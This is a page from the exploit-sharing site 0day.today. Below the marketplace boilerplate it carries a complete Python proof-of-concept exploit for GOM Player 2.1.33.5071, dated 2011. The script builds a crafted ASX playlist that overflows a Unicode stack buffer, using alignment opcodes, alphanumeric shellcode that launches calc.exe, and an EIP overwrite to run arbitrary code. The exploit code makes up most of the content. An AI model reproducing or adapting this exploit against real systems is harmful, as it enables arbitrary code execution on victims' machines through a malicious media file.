0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit
# Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. # Version: 2.1.33.5071 # Date: 30-11-2011 # Author: Debasish Mandal # Email : debasishm89@gmail.com # Software Link: http://www.gomlab.com/eng/GMP_download.html # Category:: Local # Tested on: Windows XP SP2. # Many Many Thanks to P.V.Eeckhoutte & Nilanjan De #!/usr/bin/python print "#############################################################################################" print "## GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution.#" print "## Version: 2.1.33.5071 #" print "## Author :: Debasish Mandal #" print "## Email : debasishm89@gmail.com #" print "## Blog: http://www.debasish.in/ #" print "#############################################################################################" raw_input("[*] Press Enter to generate the crafted ASX...") size = 2046 #Shellcode WinExec "Calc.exe" Unicode shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI" shellcode += "AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl" shellcode += "iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8" shellcode += "qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4" shellcode += "LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li" shellcode += "z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN" shellcode += "K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu" shellcode += "48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA" buff = '' buff += '<asx version = "3.0" ><entry><title>ArirangTV</title><ref href = "WWW.' align = "A" # align to first instruction align += "\x55\x41\x58\x41" # push ebp, pop eax align += "\x05\x11\x11" # add eax,11001100 align += "\x41" # align align += "\x2d\x10\x11" # sub eax,11001000 align += "\x41" * 109 # padding align += "\x40\x41\x40" # 2x inc eax align += "\x41" # align buff += align buff += shellcode buff += "\x41"*(size - len(align) - len(shellcode)) #eip buff += "\xd9\x57" # CALL EBP - 0x005700d9 # top of the stack buff += "\x46"*2 buff += "\x47"*100 buff +='"/></entry></asx>' f = open('LIST.asx','w') f.write(buff) f.close() print "[*] Crafted .m3u File generated" print "[*] Exit" # 0day.today [2024-06-30] #